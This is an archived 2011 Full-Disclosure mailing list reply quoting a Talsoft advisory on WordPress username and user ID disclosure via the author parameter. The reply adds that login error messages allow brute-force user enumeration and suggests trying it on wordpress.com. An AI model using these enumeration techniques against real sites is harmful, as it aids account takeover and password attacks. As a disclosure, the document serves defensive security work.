lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Message-ID: <4DDE4F52.9010503@zerial.org> Date: Thu, 26 May 2011 09:02:10 -0400 From: "Zerial." <fernando@...ial.org> To: full-disclosure@...ts.grok.org.uk Subject: Re: Talsoft S.R.L. Security Advisory - WordPress User IDs and User Names Disclosure -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Hi Veronica, Also you can "enumerate" wordpress users using the wp-login.php. When you enter a non-existent user wordpress returns "Invalid username" and when you enter a valid user with any random/dummie password, wordpress returns "Invalid Password". Now you can use brute-force to enumerate all valid users using, for example, a name&username dictionary. Try using https://wordpress.com/wp-login.php Is a bug? Is a vulnerability? Is a feature? Cheers, Zerial http://blog.zerial.org On 05/26/11 00:46, Veronica wrote: > ----------------------------------------------------------------------- > Talsoft S.R.L. Security Advisory > WordPress User IDs and User Names Disclosure > ----------------------------------------------------------------------- > > I. Advisory information > Title: WordPress User IDs and User Names Disclosure > Advisory Id: TALSOFT-2011-0526 > Advisory URL: > http://www.talsoft.com.ar/index.php/research/security-advisories/wordpress-user-id-and-user-name-disclosure > Date published: 2011-05-26 > Vendors contacted: WordPress > Author: Verónica Valeros > > II. Vulnerability information > Class: Insecure Direct Object References (CWE-715) > Impact: Low > Remotely Exploitable: Yes > Locally Exploitable: Yes > > III. Overview > WordPress platforms use a parameter called ‘author’. This parameter > accepts integer values and represents the ‘User ID’ of users in the > web site. For example: http://www.example.com/?author=1 > The problems found are: > 1. User ID values are generated consecutively. > 2. When a valid User ID is found, WordPress redirects to a web page > with the name of the author. > > These problems trigger the following attack vectors: > 1. The query response discloses whether the User ID is enabled. > 2. The query response leaks (by redirection) the User Name > corresponding with that User ID. (See update for version 3.1.3) > > User IDs can be disabled, leaving holes within the consecutive > numbers. Therefore, when an invalid User ID is sent, no redirection is > done and no information is disclosed. > > Also, the attack can be automated, sending multiple queries to extract > valid User Names and User IDs from the vulnerable web sites. > > > Update: > In version 3.1.3 the redirection explained in the second attack vector > is not done, but is still possible to find the User Name in the source > code. Therefore, this version is still vulnerable. > > IV. Affected versions > This issue was tested in versions 2.6, 3.1, 3.1.1, 3.1.3 and 3.2-beta2. > Other > versions were not tested and may be vulnerable. > > V. Non affected versions > Unknown. > > VI. Proof of concept > A Proof of Concept (PoC) is available at: > wp-userdata-disclosure-PoC.py.tar.gz > <http://www.talsoft.com.ar/weblog/wp-content/uploads/2011/05/wp-userdata-disclosure-PoC.py_.tar.gz> > > VII. Solution > WordPress version 3.1.3 fixes the redirection problem, but user names > are still been disclosed in the HTML code. No solution was provided > for this last problem. > > VIII. Disclosure timeline > + 2011-03-14: > - Vulnerability was identified. > + 2011-05-11: > - WordPress security team was contacted. > + 2011-05-12: > - WordPress confirmed the vulnerability. > + 2011-05-25: > - WordPress released version 3.1.3, which included a fix for > canonical redirection problem but did not included a fix for the > source code problem. > - WordPress security team was informed that after the release of > version 3.1.3 the vulnerability was still exploitable. > - WordPress team agreed to release the security advisory. > + 2011-05-26: > - The advisory was released. > > IX. Credits > This vulnerability was discovered and reported by Verónica Valeros > (veronicavaleros at talsoft.com.ar <http://talsoft.com.ar>) > > X. Disclaimer > The information provided in this document is for information purposes > only. Talsoft S.R.L. accepts no responsibility for any damage caused > by the use or misuse of this information. The content of this advisory > may be distributed freely, provided that no fee is charged for this > distribution and proper credit is given. > > XI. About Talsoft S.R.L. > Talsoft S.R.L is a growing company with the mission to provide > solutions in the following areas: > + Information Security > + Technology administration > + Open source solutions > + Trainings and courses > Talsoft S.R.L. is also involved in many information security research > projects. > > -- > Penetration Tester at TalSoft S.R.L. > Email: veronicavaleros@...soft.com.ar > <mailto:veronicavaleros@...soft.com.ar> > www.talsoft.com.ar <http://www.talsoft.com.ar> > > > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.11 (GNU/Linux) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/ iEYEARECAAYFAk3eT1IACgkQIP17Kywx9JSZ2ACfZlqLBPPG3C+feeSqe64n0ePw 6ecAn09kMCsQnJ4Vp5sMnamyeSOkyauD =DCLD -----END PGP SIGNATURE----- _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists